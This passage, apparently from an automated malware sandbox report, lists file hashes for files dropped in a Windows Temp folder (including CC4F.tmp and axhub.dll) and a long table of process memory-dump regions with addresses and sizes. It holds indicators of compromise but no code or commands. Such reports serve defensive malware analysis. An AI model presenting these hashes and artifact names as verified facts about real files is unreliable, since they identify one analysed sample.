                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                • \Users\Admin\AppData\Local\Temp\CC4F.tmp
                                                                                                                  MD5

                                                                                                                  50741b3f2d7debf5d2bed63d88404029

                                                                                                                  SHA1

                                                                                                                  56210388a627b926162b36967045be06ffb1aad3

                                                                                                                  SHA256

                                                                                                                  f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                                                                  SHA512

                                                                                                                  fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                                • \Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                  MD5

                                                                                                                  1c7be730bdc4833afb7117d48c3fd513

                                                                                                                  SHA1

                                                                                                                  dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                  SHA256

                                                                                                                  8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                  SHA512

                                                                                                                  7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                • memory/8-177-0x00000268D60C0000-0x00000268D60C2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/8-199-0x00000268D63A0000-0x00000268D63EC000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  304KB

                                                                                                                • memory/8-200-0x00000268D6460000-0x00000268D64D1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/188-168-0x0000000000000000-mapping.dmp
                                                                                                                • memory/344-207-0x000001F8C3180000-0x000001F8C31F1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/576-163-0x0000000000380000-0x0000000000381000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/576-161-0x0000000000000000-mapping.dmp
                                                                                                                • memory/576-165-0x000000001AF30000-0x000000001AF32000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/932-144-0x0000000000000000-mapping.dmp
                                                                                                                • memory/936-203-0x0000025DF5ED0000-0x0000025DF5F41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/988-148-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1000-415-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1080-197-0x000001D9C6150000-0x000001D9C61C1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/1268-223-0x000002128D0A0000-0x000002128D111000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/1356-224-0x000001CFD9800000-0x000001CFD9871000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/1412-208-0x00000193E2B80000-0x00000193E2BF1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/1536-114-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1612-191-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4.6MB

                                                                                                                • memory/1612-156-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1612-190-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  36KB

                                                                                                                • memory/1648-445-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1904-213-0x000002089BB40000-0x000002089BBB1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/1940-147-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2196-152-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2196-189-0x0000000000900000-0x00000000009AE000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  696KB

                                                                                                                • memory/2196-192-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4.9MB

                                                                                                                • memory/2284-146-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2468-212-0x0000021988260000-0x00000219882D1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/2488-210-0x000001882B4B0000-0x000001882B521000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/2672-202-0x0000020467070000-0x00000204670E1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/2756-400-0x0000000002900000-0x0000000002916000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  88KB

                                                                                                                • memory/2756-278-0x0000000000960000-0x0000000000975000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  84KB

                                                                                                                • memory/2776-225-0x000001A643C80000-0x000001A643CF1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/2796-226-0x000001C58DC10000-0x000001C58DC81000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/2928-196-0x00000000049D0000-0x0000000004A2D000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  372KB

                                                                                                                • memory/2928-194-0x0000000004A5E000-0x0000000004B5F000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.0MB

                                                                                                                • memory/2928-173-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2940-428-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3104-145-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3212-157-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3260-150-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3368-151-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3468-166-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3488-154-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3524-206-0x0000015814BC0000-0x0000015814C31000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  452KB

                                                                                                                • memory/3524-178-0x00007FF77C0D4060-mapping.dmp
                                                                                                                • memory/3652-133-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  100KB

                                                                                                                • memory/3652-117-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3652-130-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  100KB

                                                                                                                • memory/3652-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  572KB

                                                                                                                • memory/3652-132-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  100KB

                                                                                                                • memory/3652-134-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.5MB

                                                                                                                • memory/3652-136-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  152KB

                                                                                                                • memory/3652-135-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  100KB

                                                                                                                • memory/3652-137-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.1MB

                                                                                                                • memory/3692-149-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3972-287-0x00007FF77C0D4060-mapping.dmp
                                                                                                                • memory/3972-439-0x000001BBC8300000-0x000001BBC8406000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.0MB

                                                                                                                • memory/3972-301-0x000001BBC59D0000-0x000001BBC5A44000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  464KB

                                                                                                                • memory/3972-299-0x000001BBC5690000-0x000001BBC56DE000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  312KB

                                                                                                                • memory/3972-437-0x000001BBC57B0000-0x000001BBC57CB000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  108KB

                                                                                                                • memory/3992-424-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3992-438-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4100-329-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  120KB

                                                                                                                • memory/4100-331-0x000000000041884E-mapping.dmp
                                                                                                                • memory/4100-345-0x0000000004BE0000-0x00000000051E6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  6.0MB

                                                                                                                • memory/4212-328-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  120KB

                                                                                                                • memory/4212-330-0x0000000000418836-mapping.dmp
                                                                                                                • memory/4212-344-0x0000000005140000-0x0000000005746000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  6.0MB

                                                                                                                • memory/4268-416-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4408-276-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4408-298-0x0000000001590000-0x0000000001591000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4408-310-0x000000001BAE0000-0x000000001BAE2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4408-315-0x0000000002FF0000-0x0000000002FF1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4408-309-0x00000000015A0000-0x00000000015C3000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  140KB

                                                                                                                • memory/4408-284-0x0000000000E60000-0x0000000000E61000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4412-281-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4432-358-0x0000000001FD0000-0x000000000201A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  296KB

                                                                                                                • memory/4432-277-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4432-362-0x0000000000400000-0x00000000004DE000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  888KB

                                                                                                                • memory/4544-323-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4632-398-0x000000000041888A-mapping.dmp
                                                                                                                • memory/4632-413-0x00000000055C0000-0x0000000005ABE000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  5.0MB

                                                                                                                • memory/4788-227-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4796-228-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4796-376-0x00000000020F0000-0x000000000218D000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  628KB

                                                                                                                • memory/4796-378-0x0000000000400000-0x00000000004AA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  680KB

                                                                                                                • memory/4812-229-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4824-394-0x00000000054D0000-0x00000000054D1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4824-286-0x0000000005440000-0x0000000005441000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4824-231-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4824-280-0x0000000000C40000-0x0000000000C41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4832-347-0x0000000000460000-0x000000000050E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  696KB

                                                                                                                • memory/4832-230-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4832-349-0x0000000000400000-0x0000000000460000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  384KB

                                                                                                                • memory/4840-285-0x000001F1857B0000-0x000001F1857B1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4840-236-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4848-311-0x0000000005740000-0x0000000005741000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4848-304-0x0000000001620000-0x0000000001621000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4848-289-0x0000000000C60000-0x0000000000C61000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4848-235-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4856-234-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4864-357-0x0000000000850000-0x000000000085A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  40KB

                                                                                                                • memory/4864-233-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4872-404-0x00000209AA9A0000-0x00000209AAA71000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  836KB

                                                                                                                • memory/4872-402-0x00000209AA930000-0x00000209AA9A0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/4872-232-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4880-237-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4892-312-0x0000000000A30000-0x0000000000A31000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4892-327-0x0000000005C30000-0x0000000005C31000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4892-321-0x00000000059D0000-0x00000000059D1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4892-325-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4892-322-0x0000000005A30000-0x0000000005A31000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4892-324-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4892-243-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4892-319-0x00000000060D0000-0x00000000060D1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4892-307-0x00000000779E0000-0x0000000077B6E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.6MB

                                                                                                                • memory/4920-239-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4932-380-0x0000000004C22000-0x0000000004C23000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4932-382-0x0000000004C24000-0x0000000004C26000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4932-365-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  860KB

                                                                                                                • memory/4932-364-0x0000000000610000-0x000000000075A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.3MB

                                                                                                                • memory/4932-377-0x0000000004C20000-0x0000000004C21000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4932-238-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4932-381-0x0000000004C23000-0x0000000004C24000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4940-240-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4940-387-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  9.3MB

                                                                                                                • memory/4940-383-0x0000000002DF0000-0x0000000003716000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  9.1MB

                                                                                                                • memory/4964-241-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4964-379-0x0000000000E60000-0x0000000000E62000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4964-279-0x0000000000440000-0x0000000000441000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4972-242-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4980-244-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4980-296-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4980-314-0x00000000058B0000-0x00000000058B1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4980-317-0x0000000005DC0000-0x0000000005DC1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5004-316-0x0000000002D00000-0x0000000002D01000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5004-293-0x0000000000A50000-0x0000000000A51000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5004-245-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5040-429-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5160-326-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5172-346-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  120KB

                                                                                                                • memory/5172-348-0x000000000041884A-mapping.dmp
                                                                                                                • memory/5172-359-0x0000000004D00000-0x0000000005306000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  6.0MB

                                                                                                                • memory/5208-408-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5428-363-0x0000000000402E1A-mapping.dmp
                                                                                                                • memory/5428-360-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  36KB

                                                                                                                • memory/5628-417-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5740-385-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5828-422-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5884-393-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5904-448-0x0000016CAFC50000-0x0000016CAFD1F000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  828KB

                                                                                                                • memory/5904-447-0x0000016CAFBE0000-0x0000016CAFC4E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  440KB

                                                                                                                • memory/5904-386-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5924-388-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5944-389-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6004-392-0x0000000000000000-mapping.dmp